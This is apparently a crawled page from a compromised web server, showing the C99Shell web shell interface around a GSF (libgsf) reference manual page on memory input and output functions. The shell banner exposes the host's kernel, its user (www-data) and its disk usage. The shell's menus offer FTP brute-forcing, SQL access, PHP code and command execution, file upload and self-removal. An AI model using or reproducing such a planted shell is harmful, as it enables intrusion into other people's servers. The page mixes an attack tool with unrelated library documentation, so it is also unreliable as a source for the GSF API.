!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/libgsf-1-dev/html/gsf/   drwxr-xr-x
Free 13.27 GB of 57.97 GB (22.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     gsf-memory.html (16.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
memory: GSF Reference Manual

memory

memory

Types and Values

Object Hierarchy

    GObject
    ├── GsfInput
       ╰── GsfInputMemory
    ├── GsfOutput
       ╰── GsfOutputMemory
    ╰── GsfSharedMemory

Description

Functions

gsf_input_mmap_new ()

GsfInput *
gsf_input_mmap_new (char const *filename,
                    GError **err);

Parameters

filename

The file on disk that you want to mmap

 

err

A GError.

[nullable]

Returns

A new GsfInputMemory


gsf_input_memory_new ()

GsfInput *
gsf_input_memory_new (guint8 const *buf,
                      gsf_off_t length,
                      gboolean needs_free);

Parameters

buf

The input bytes.

[array length=length]

length

The length of buf

 

needs_free

Whether you want this memory to be free'd at object destruction

 

Returns

A new GsfInputMemory


gsf_input_memory_new_clone ()

GsfInput *
gsf_input_memory_new_clone (guint8 const *buf,
                            gsf_off_t length);

Parameters

buf

The input bytes.

[array length=length]

length

The length of buf

 

Returns

A new GsfInputMemory


gsf_input_memory_new_from_iochannel ()

GsfInput *
gsf_input_memory_new_from_iochannel (GIOChannel *channel,
                                     GError **error);

Parameters

channel

a GIOChannel.

 

error

a GError

 

Returns

a new GsfInputMemory or NULL.


gsf_output_memory_get_bytes ()

const guint8 *
gsf_output_memory_get_bytes (GsfOutputMemory *mem);

Parameters

mem

the output device.

 

Returns

The data that has been written to mem .

[array][nullable]


gsf_output_memory_new ()

GsfOutput *
gsf_output_memory_new (void);

Returns

a new file.

[nullable]

Types and Values

GsfInputMemory

typedef struct _GsfInputMemory GsfInputMemory;

GsfOutputMemory

typedef struct _GsfOutputMemory GsfOutputMemory;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--